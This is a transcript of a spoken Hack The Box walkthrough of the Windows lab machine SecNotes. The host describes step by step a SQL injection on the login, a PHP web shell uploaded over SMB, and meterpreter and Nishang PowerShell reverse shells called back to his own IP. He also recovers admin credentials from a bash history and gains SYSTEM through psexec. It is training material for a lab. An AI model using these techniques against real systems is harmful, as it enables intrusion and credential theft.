Hey everyone, welcome back to another edition of Can You Hack It? I am your host Ben, and this week we're back on Hackthebox.eu again, taking a look at a Windows system called SecNotes. Now it's been a while since I've done a Hack the Box video, and this one I didn't have time to prepare for, but I did have enough time, I think, to shoot it since I had already done the box a while ago, and I think I remember what to do, and figured I might as well see if we can get a video done. So as you can see here, the IP address of the box is 10.10.10.97. And let's see, it looks like difficulty ratings are somewhere in the middle for the most part for both user own and root. Root has a little bit more difficulty. Let's just jump in and see what we can find. So open up a terminal here, wrong window. And we'll create a directory to work out of, so we'll do mkdir-p SecNotes Nmap. And so that'll create both the SecNotes directory and the Nmap directory below it. Switch into SecNotes and we'll run our Nmaps. We'll do Nmap-T5 to make the timing aggressive, SC and SV to enumerate scripts and versions, V to be verbose so that we can see output while it's running, OA to output all formats, and we'll write those to nmaps/quick. And then finally the IP address of the box, which is 10.10.10.97. And I typed something wrong. I typed nmap wrong. Wouldn't be a video if I didn't typo. So right away we can see 445, which is SMB, and 80, which is a web server, or most likely is a web server. Since it's a Windows box, probably an IIS web server. This should take just a second to finish while it pops up. Oops. While it pops up, we could bring up a browser, take a quick look at the website. And so it looks like login, fill in your credentials to log in. I'll minimize that for a second, see if this is finished. It hasn't yet. So we'll just try like admin. It fails saying no account found with username, and it highlights that input box, which makes me think maybe we can enumerate users because it didn't give a more generic error like bad credentials. Problem is we don't know a good username. We can sign up one real quick. Let's do please subscribe, and we'll just make the password. Submit that. We'll try logging in with please subscribe and bad pass. And so it points out that the password that we entered was not valid. So it is a way to enumerate users. So if we log in real quick with the correct credentials, and we can see a site that says viewing secure notes for please subscribe, user please subscribe, has no notes, create one by clicking below. We have a GDPR warning up above. We have what's likely a valid username then, Tyler at SecNotes.htb. We sign out real quick. Try and sign in with Tyler and password. We get that the password's not valid, so he is a valid user. Let's look and see if this finished yet. It did, so we have IIS 10, which I believe would be running on Windows 10. So if we look in here real quick. Yeah, so 1809 is a Windows 10 version. There's probably a better way to find a more comprehensive list, but I just happen to know that that is a build of Windows 10. So yeah, and you can actually see here it was shipped with Windows 10 and Server 2016, so it's on one of the two. Let's go back to this page real quick. Let's actually start up a full Nmap also. Have it running in the background since we're not going to be scanning anything just yet. So we'll do full. And we'll add -p- here, which will have it do all the TCP ports. Except I screwed something up. Oh, put that in the wrong spot. And so then while that's going, let's play around with this a little bit more. So since it shows our username when we log in a couple places, it's possible it's vulnerable to SQL injections. It's kind of a pain since we have to sign up and then go log in and see what happened, but that's not too big of a deal. So let's try and use, well, first I'll pull up Sublime Text and show, for people that don't know what it probably looks like, it's probably something like select some fields, whatever they are. We'll just say all fields from users where user or username is equal to some value that we pass in, the username that the login uses, and password is equal to some password that they send. And so sometimes what we can do is manipulate this query by basically, this would be quoted off usually. So whatever the username that we passed in was. And same thing here. And so we could pass in, normally you'd pass in a user like Iceman. We could also do something like pass in Iceman with another single quote. Sorry, Sublime Text is trying to be helpful here. With another single quote on it. And then we could do something like or 1 equals 1. And then we could do a comment or do a multi-line comment. And that would make it so that SQL doesn't process the rest of this. And so what it would do is it would select everything from users where the username's Iceman or 1's equal to 1, which 1's always equal to 1, so that would return true. And so what it would do is it would end up nullifying this where clause, and it would just end up doing a select all from users. So we can try and do that by registering a crafted username. So we can do like Iceman, close off the quote that's likely there, or 1 equals 1, and then comment out everything that's the rest of it. Password. I'm actually just going to copy and paste this so I don't have to type it again. Oops. I didn't actually notice that until I did it. I think didn't actually copy it. Or 1 equals 1 and multi-line comment. So we submit that, and then we try and log in with that and password. And we get an internal server error. So likely we are able to do some sort of SQL injection, or we probably wouldn't have seen the internal server error. They're not showing us the actual error messages, so it's not as helpful, but we can still kind of poke around and see if we can figure things out. Let's see, we can go back. We can try and figure out what the back end is, if it's SQL, MySQL or MS SQL. So we could do something like test ing and see how concatenation's handled. So this would basically, you'd have the single quote from the query that would close off test, and then you'd have the other single quote at the other end closing off ing. And this space in the middle would just be a concatenation in MS SQL, but it wouldn't work in MySQL. So if we just do password, and then we try and log in with that. So it's test in, out, and password. And so we can see that we can log in with that. So maybe it's an MS SQL backend, but before we do that, let's sign back out and let's try seeing what it does with a MySQL syntaxed one. So test plus ing password. Username's already taken. Let's see if I can log in with it. Okay, and so what we actually see here is a little interesting. I'm not sure why we're seeing other people's notes when we use this. Because if this is being handled the way I think it is, where our user input's being taken and just put into the query string, concatenated into it, then this should have just concatenated into a user called testing. But we can see here that we got notes from somebody else's account. We've got a sticky buns recipe, a list of years, and then new site, and it looks like an SMB path, and then username and password. So the interesting thing here, which I hadn't seen this before, because when I first did the box originally, because I didn't try and figure out what the back end was, and so the way that I'd ended up getting these same things was a little bit different, which I'll log out and show real quick. If I remember towards the end of this video, we'll take a look at the source code and see if we can figure out why this is happening. If I don't, and you happen to know why, feel free to comment it. So basically what I did before was registered, after I'd logged in and seen the GDPR notice from Tyler, I had decided to see if I could do something like, please subscribe, close it off, or username is equal to Tyler. And so what this basically does is, same as before, I'll leave Iceman in there, it's fine. So since I'm putting that in there, I'm closing off the quote, doing an or, and then here I put in Tyler instead, or username equals Tyler. And so this is what ends up going in there. And so there it's looking to see if it's selecting a user where username's equal to Iceman or username's equal to Tyler and password's equal to password. And so if we do that, I'll actually just copy this again. Then when we log in, we also see Tyler's notes, because now it's looking for notes from please subscribe or Tyler. And so like I said, maybe if we get some time and I actually remember, we'll dig into why this is happening. For now, we'll just continue on. So we've got a set of SMB credentials, or what we believe are SMB credentials. So let's go ahead and copy the password. And let's see if we can log in through SMB. And it looks like our other scan finished. The only other thing it picked up was a web server, again running IIS on port 8808. So I guess we can take a look there real quick. 10, 10, 10, 97, 8808. It looks like it's just an IIS start page. So let's try and connect with SMB. So we do SMB client, SecNotes.htb, I think was the URL or the path, and new site, user Tyler. Oh, first we're going to need to edit our hosts file. And so we'll want to insert 10, 10, 10, 97, and that's going to be SecNotes.htb. We'll write that. Now if we try it, it asks us for a password. And so now it looks like we're logged in. We can do an ls to see what's there. It looks like a directory called Microsoft, and then the IIS start page and the IIS PNG. If we switch directories into Microsoft, see what's in there. Windows. That's interesting. PowerShell. I don't know that I've seen this before when I've logged in. I don't know if somebody might be doing something screwy. I'm just going to back out. It's probably going to go forever. And I don't think that's supposed to be there. At least I don't remember it. So we've got in IIS start page, we've got PNG also. And so what we'll want to do now is see if we can possibly upload like a web shell or something. And this looks like it's probably the root of the second server we found, the 8808, because we don't see any of the files that we saw on the SecNotes site. So let's quit out of this real quick. Let's create a couple test files. So first we'll create one for like ASP files. So we just do like an echo, we're actually going to do vim because test.asp. And we'll just insert like a response.write. This is an ASP test. And close that off. And save it. And then we'll do a PHP one also. Test.php. And that's going to be, I think we can just do PHP echo. This is a PHP test. Oops, did I not get that in there? Okay, and then again, write that. And so now if we reconnect to SMB and we put our password back in, and let's try and put test.asp, oops, put test.asp, and put test.php. So now that those are both up there, we can try and browse to them. So if we bring up our browser, go to test.asp, we get a 404 error, test.php. We get a blank page, so I might have just screwed up my PHP. I don't know why the test.asp wasn't showing up. It looks like it is in the folders, so it's possible there's not a handler for ASPs set up, or they removed it to make it so that we couldn't just stick something easier, like a ASP web shell or something, although we can presumably do a PHP one. But so let's try something a little different with the PHP one then. Let's just open another tab. Vim shell.php. Let's try and make a PHP shell. So if we do PHP if get cmd echo pass through and we'll get command again, and we'll actually want to concatenate that with that, which what that does is it redirects standard out to, or sorry, standard error to standard out, so that we can see error messages if they occur. Otherwise, if we try and execute a command and we have bad syntax or something, we just won't see anything, which is not helpful. Yeah, that works for me. So then if we upload shell.php instead, put shell.php. Let's try that. Shell.php question cmd equals who am I? And I screwed something up. So let's take a look real quick and see what I butchered. Oh, that's probably what I screwed up on the first one too. There we go. Now the syntax highlighting looks better. So let's try and send that one up instead. And we can see that we're SecNotes Tyler. So what we can do now, since we can execute our own PHP code, is let's see if we can get a Metasploit meterpreter session. And so if we switch back here real quick, let's generate a payload. So if we use MSF Venom and then -p for payload, and we'll use PHP meterpreter reverse TCP, which we'll need to set lhost to 10.10.14.4, and we'll need to set our L port, and we'll set that to 1337. Format, there's actually not a PHP format. We'll just do raw and then exploit PHP. And I think when this generates, we'll actually need to edit it a little bit, because I think they comment out the first line. Yeah. So if we write that, now we've got a meterpreter payload that we can try and upload and execute. First, we're going to need a handler though, so let's split this window real quick. MSF console. And so we'll do use exploit multi-handler, set payload to PHP meterpreter reverse TCP, and then we'll set our L host 10.10.14.4 and set our L port 1337. We'll set exit on session to false, and then we'll just do exploit -j. So now our handler is listening. And then if we switch back up to the upper window, we should be able to let's actually reconnect real quick to our SMB session from here. SMB client SecNotes.htb new site -u u Tyler. Tyler's password. And let's squeeze this all down a little bit. Okay, and so if we put shell.php again, just in case it gets cleared, because I think they periodically clear out this directory, and then we'll put exploit.php. And so now instead of shell.php, let's call exploit.php. And we can see that we got a session down here. It's sending the second stage of it. We do sessions-l. Looks like we have one, so we do sessions-I and interact with one. We do a who am I? We do a shell. Who am I? Looks like our shell may not be stable. Background it for a second. Can't background it. Looks like it died. And so I saw this on there before. I think what's happening is antivirus is on there, and so while we're able to get an initial connection within a few seconds usually, it dies. Technically, I think I've had enough time before where I could bounce around and kind of get at some files. Let's see here real quick. One thing I hadn't tried before that we can try is if we can if we can get process list and migrate into a different process. Looks like process list, we can't actually get any processes, so we wouldn't be able to migrate. So this is probably a dead end. So we'll exit out of here. Just exit out of that split window. So let's go back to our shell. Question CMD equals who am I? So that's still there and working. Let's do a dir. Let's do a pwd, I guess. Sorry, I forget this is Windows. I think we can just do cd. So we're in inetpub news site. We could do dir : / inetpub www root is probably where the other application is. Yeah, and so we can see the db.php, home.php. We can see a bunch of PHP files in there. Let's try real quick and see if we can create a payload in something like Veil and use that to get a meterpreter session. So if we do Veil, I think I have to locate it. Veil.py, I think. Opt veil.py. Do T evasion. P, we can use the Go one. The Go one seems to not get caught by a lot of antivirus. Sorry, I don't know if I spelled that right. Meterpreter. TCP.py. I think they pass parameters like this: IP 10.10.14.4, port 1337. Did not provide a valid tool name. Wonder if I have to actually be in that directory for some reason. That looks more like what I expected. So it was able to create an executable and write it to this directory, or sorry, that place. Let's switch back to the directory we were in, do a copy. Just copy that locally. Let's actually move it to payload.exe instead of payload 1. Okay. And so now what we need to do is just upload that to the web server and then try and use our shell here to execute it. Of course, before we do that, we need to have a another meterpreter session open. So, or sorry, Metasploit handler. We'll start up MSF console again. Use exploit multi-handler. Set payload to Windows meterpreter reverse TCP. Set lhost to 10.10.14.4. Set L port to 1337. And then set exit on session to false and exploit -J. So now we are listening for that connection back from our Veil payload. So if we put payload.exe, quick ls, make sure all our stuff's still here. Do payload.exe. The system cannot execute the specified program, so it's possible that the administrator on this box has, can't think of the name of it, but there's a feature in Windows where you can turn off execution of unknown files. or even whitelist only specific ones that can run. We can actually try and unblock it if it is just being blocked. Let's see here. We change our command to PowerShell.exe. No profile, because we don't want to load a profile. Non-interactive. Command unblock file. We need to give a path. ://inet hub. New site. Payload.exe. And then close off the double quotes. Unblock file cannot find path because it does not exist. That's interesting. Oh, our payload was actually deleted out of here. Put payload.exe. So it's possible there is antivirus and it is picking it up. That time we were able to execute that command to unblock it. And so if we just try and execute it now, still can't execute the specified program. What if we do let's see, where's the PowerShell command? So this time instead of unblock file, we'll just try and run it. Program payload.exe failed. The run operation did not complete successfully because the file contains a virus or potentially unwanted software. So it looks like we're probably at a dead end there. So what we can try instead is something a little less, it's a little less likely to trigger antivirus. So let's see if we can pull Nishang PowerShell. And we'll use one of its PowerShell reverse shells. So Invoke-PowerShellTcp.ps1. Take that, take the raw view of it, copy it, vim Invoke-PowerShellTcp.ps1. Paste that in. And then at the bottom, we're actually going to just have it invoke directly. That way we can call it with PowerShell and have it run. We'll use that example there. So if we do invoke PowerShell TCP reverse IP address is 10.10.14.4. Port is, yeah, we'll do 4444. Write that. And then we can switch back over here, get out of our Metasploit, and just start a regular netcat listener. So nc-lvnp 4444. And so I think we've got everything we need, other than over here we're going to need a Python web server. We'll have that serve on port 80. So now we should be ready. We've got our PowerShell script. We've got a server to serve the PowerShell script. We've got a netcat listener that's listening on the port that our PowerShell script will try and connect back to. So all that leaves is to try and execute a command to run it here in our shell. So let's do IEX for invoke expression, couple parentheses, new object net.web client. So what that's going to do is create a new web client, and we'll do download string, and we're going to want to download from our Python web server, so 10.10.14.4 /invoke PowerShell SMB-Enumeration.PowerShellTcp.ps1. Close that off. So let me take a look real quick and make sure that all looks right. I think it is. So what this is going to do is download that script, and then the invoke web expression is going to actually execute the script. Because the download is going to download it as a string, so it's going to output the actual contents to invoke expression. And if everything works right, we should see it download here in a second, and then we should see a reverse shell in our netcat session. The fact we just got a blank screen, though, makes me think I typed something wrong. Actually put this back to full screen so it's a little easier to see. So IEX, new object, client. Oh, I've got double quoted. So we see it download. Let's check and see if we have a connection. We do. And so let's make this full screen again. So we do a who am I. So we're still SecNotes Tyler, so same context as we saw in the browser, which is what we would expect. But we now have a interactive PowerShell session instead of that goofy, really simple PHP shell. And so we should be able to see if we can get to the user flag now, which should be in users Tyler desktop. So we do an ls here. We see user.txt. We also actually see a couple links. So Notepad++, we don't care about Edge. We see one for File Explorer, which is a little weird, but somebody probably just dragged it there. We see one for the command prompt, and we see a bash.lnk, which is actually kind of strange. The bash one's also quite a bit newer. It's likely that they have enabled Windows Subsystem on Linux, which I've done some previous videos about how to use Windows Subsystem for Linux to make a Kali machine. So we'll poke around at that and see, because sometimes there's some interesting stuff we can do through there that we can't do on the host. But first, let's just see if we can get the user flag. So type user.text substring 0 to 16. And so since we're in a PowerShell session, I don't have to wrap all that like I normally would. And so there's the first 16 characters of the user flag. So before we mess around with the bash stuff, let's just take a look real quick and see if we happen to be able to look in anybody else's directories. So we drop down 2 directories, administrator, desktop. Maybe I messed that up. Let's try this. So we get a permission denied. Do dir here. We've got new, and then new site. Permission denied. Permission denied. Permission denied. So nothing interesting in any of those, or if there is anything interesting in any of those, we can't see it. Go back into Tyler's desktop. Well, technically we don't need to do this from his desktop, I suppose. We should be able to just run bash-c, I think, to execute a command. Do like who am I. And so we do have Windows Subsystem for Linux on here, and we're running in there as root. I still don't think that actually allows us to do something like bypass file permissions, because the file permissions on the Linux portion of it are different than the file permissions on the Windows portion of it. So like, while we could do something like look in, let's do like a ls/root. So we can look in the root folder, --c ls-la root. So while we have full permissions on the Linux portion of the system, I think if we looked at, I think it's mntc, oops, yeah, ls mntc, ls, let's just do this, lsla mntc users administrator. did I forget to terminate it with a quote? --c ls lamnt users. And so we can actually see here that, like the administrators directory, we have execute permissions in, but we don't have read or write. And that's the same thing with all these other directories that we don't have permission to access. So despite the fact that we're root, we still can't actually access anything useful in them. Now, maybe if we were running as a privileged user, we could change permissions. But since we aren't, we can't. I actually want to look at, let's see, --c ls-la home directory again. I thought I saw, so we've got a bash history there, so we could take a look at that. We've also got that file system, which --c ls-la file system. Sorry, I forgot to close off the quote again. So there's nothing interesting in there. Let's cat bash history. So bash history, it looks like he CDs into the Windows root. Does an ls CDs into users. CD / CD ls pwd. He makes a directory called file system. So he went back to his root directory, created a file system folder, which is what we saw here, and then tries to mount it to an SMB share for the root of C, it looks like. Probably doesn't have a tool he needs, so install CIFS utils. Again, tries to mount it. Again, tries to mount it, this time with user administrator. Looks like he tries to cat proc file systems. Mod probe inserts the CIFS module, which is for SMB, into the kernel. Then he does SMB client. Then he apt installs SMB client again, and this is the interesting part here. He does SMB client -u, and he has this string, and this string's actually the username and the password, separated by this %sign. And then he's connecting to the hidden C share. Then it looks like he's doing less bash history and exiting. So let's actually take this line, because I think we can use this to connect with SMB. So if we go back to our window with SMB in it, exit out of this session. Let's just paste, oops, what did I do? Oh, I pasted the script. So we paste that. I don't think this format actually works, but we can try. So what we need to do instead is kind of redo the format on this. So we'll make the user administrator, and we'll connect to SecNotes.htb into the hidden C share. It wants the administrator's password, so we'll take this portion and we'll paste that. Login failed. Make sure it's pasting the right thing. I wasn't, I missed the letter H somehow. And so now it looks like we're connected to the root of the C drive. We technically can probably go into users, administrator, desktop, and we could access root.txt from here. Just because everybody loves to get a root shell, we'll actually back out of this real quick. And what we'll do instead is we will try and see if we can use the psexec module to get a actual command prompt. And for those who aren't familiar, a real quick explanation of what psexec does is it uses another hidden share called the admin share to deploy a service to the system, and then it uses RPC over SMB to access that service through the service control manager, its API. And then it turns on the service and uses a named pipe to allow us to send commands to it and have it execute them. And so basically what we're going to do is try and get it to just run cmd for us so that we get a command prompt. So I think if we do, let's take this line up here again. So we do psexec, and I think we just need the username and the password. And I think it needs to be separated by a colon instead. And then at SecNotes.htb. And then the command we want it to run, which will just be cmd. Or I suppose we could do PowerShell also. Let's try PowerShell. Don't know if that'll actually work. C:, oh wait. Then we want to set our path. So path C://Windows system32. We'll see if this works or not. So it found a writable shared admin. It uploaded that file I was talking about, the service. Opened the service manager, it's creating its service, and then it's starting its service like we talked about, and it should use a named pipe to send the command PowerShell. If it all works, here in just a second it should pop open a PowerShell window. If it fails, we can use cmd because I know that works. I've just never tried PowerShell through this. It should work in theory, but and it looks like we have a PowerShell prompt now. Who am I? And we are NT authority system. So we've got all the privileges in the world. We can do anything we want. We can obviously just do type C:users, administrator, desktop. Oops, one too many slashes there, not that it should matter. Root.text, substring, 0 to 16. And we should see the first 16 of the root flag. And there we have it. So that's all there is to doing this box. Oh yeah, let's take a look real quick. Pub root. So it's probably in home.php, type home.php. My PHP is kind of rusty too, so hopefully I can see it correctly. So it's requiring auth.php and db.php. So there's our GDPR. So if delete post. MySQL fetch rows res. So our SQL query is select ID title note created at from posts where username is equal to the username. And so I still actually don't see how that concatenation test we did worked. I can see how the Tyler one worked, obviously, because that turns out to be username, where username's equal to Iceman or username's equal to Tyler. The first one that we accidentally stumbled across basically equates to where username's equal to testing, and it's still getting it to come up. So that's kind of strange. It's possible, I suppose, that the username is testing the way that we formatted it, and that it's equating to just the word testing when it's executed here, and that because it's not equal to anybody, it would select it. But even then, it shouldn't. In that case, it shouldn't find anything. It shouldn't just default to showing everything. But anyway, I don't know that it's that important, and we're already at 50 minutes, and I'm already out of time. So feel free to comment if you know why that's happening. And that'll be it for this video. If I have some extra time this weekend, I'm going to try and get around to doing the more detailed deep dive into the exploits of that tiny web server from Smasher. Like I'd promised, some people were commenting that that went too fast and they didn't really understand it. So I was going to try and do a video that dives deeper into it. It's still probably going to be a long video. I would be thinking somewhere around 2 hours maybe a little bit less than that, maybe an hour and a half, since we'll skip some of the stuff like sticking stuff directly on the stack and trying to execute it, because we know that doesn't work since, well, without brute forcing, since address space layout randomization is turned on the server. And so instead, I'll just do a deep dive specifically into the working exploit and why it worked and how it worked. Like I said, I don't know if I'm going to have time this weekend to do it. These things take forever to do, and I'm usually pretty busy. This weekend's a little bit lighter, which is why I'm trying to rush this one a bit so that I possibly have some time tomorrow to shoot the other one. Anyway, if you liked the video, give it a thumbs up, subscribe to the channel. Feel free to message me on Hackthebox at Iceman, that's IC3M4N. Be forewarned, I have not been on there very much lately. I just don't have enough time to do anything. In fact, I think I've gotten to the point where there's probably only like a small handful of boxes that are currently active that I have done. But I'm going to try and see if I can squeeze out some time to get back on there more regularly. So feel free to comment or to message me on there if you want anyway. Follow me on Twitter. I think it's at Ben Grewell. Sad that I don't know that. There is a link somewhere on my YouTube profile also for it. Anyway, hope you have a great weekend or whatever day it is you're watching this video, and I will see you on the next one. By the way, if there's specific things you want to see, not necessarily in Hack the Box videos, but like techniques you want to see, or like if you wanted to see more videos on how to use executables that are always in the system, like a Windows system or a Linux system, to do things that people don't normally think of, like using wget to exfiltrate data or something. Or I did one recently on exfiltrating data over ping. If you want to see stuff like that, feel free to comment and request it. If I have time, I'll shoot it. Well, time and expertise, because like everybody, I don't know everything. So if I know something about it and I've got time to make a video, I'd be happy to. That's it, I guess. Have a good one.